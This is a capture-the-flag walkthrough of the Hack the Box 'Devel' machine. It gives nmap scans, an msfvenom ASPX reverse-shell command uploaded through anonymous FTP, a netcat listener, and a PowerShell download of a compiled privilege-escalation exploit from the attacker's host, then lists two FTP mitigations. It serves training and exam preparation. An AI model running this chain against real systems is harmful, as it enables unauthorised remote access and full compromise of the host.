Hack the Box — Devel

One of the first HTB boxes I solved a few months ago from the TJ Null List in preparation for the PNPT and OSCP.

Solving the “Devel” box can be divided into 3 main steps:

1. Recon

• We conduct some recon using nmap or rustscan
• look into MS-IIS/7.5, google a bit about executable file types

2. Enumeration

• using the anonymous FTP access

3. Exploitation

• Use FTP to upload a reverse shell
• After this initial foothold, we priv esc using a https://www.exploit-db.com/exploits/40564
• Gain system authority

Recon

nmap -sC -sV -O -oA nmap/initial 10.10.10.5

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.5

nmap -sU -O -oA nmap/udp 10.10.10.5

Enum

We have some web-facing material and we can try to go to these pages.

> I think “evil” is left over from someone else working on the box 😅

Exploitation

Create reverse-shell.aspx with msfvenom

msfvenom -p windows/shell_reverse_tcp -f aspx LHOST=10.10.14.37 LPORT=4444 -o reverse-shell.aspx

Push reverse-shell.aspx to the webserver

Start a listener with netcat in another terminal

nc -nlvp 4444

Visit http://10.10.10.5/reverse-shell.aspx to activate the payload

Gain shell on the listener

Priv Esc

Find an exploit that works

searchsploit -m 40564

#this will download it to our currect directory

Compile it

i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

Serve it

Get it with powershell or certutil

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.37:443/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"

Once bad.exe is run the priv esc is immediate

Mitigation- How could this attack have been stopped?

1. Disable anonymous access to the FTP server
2. Configure the FTP server to only allow downloads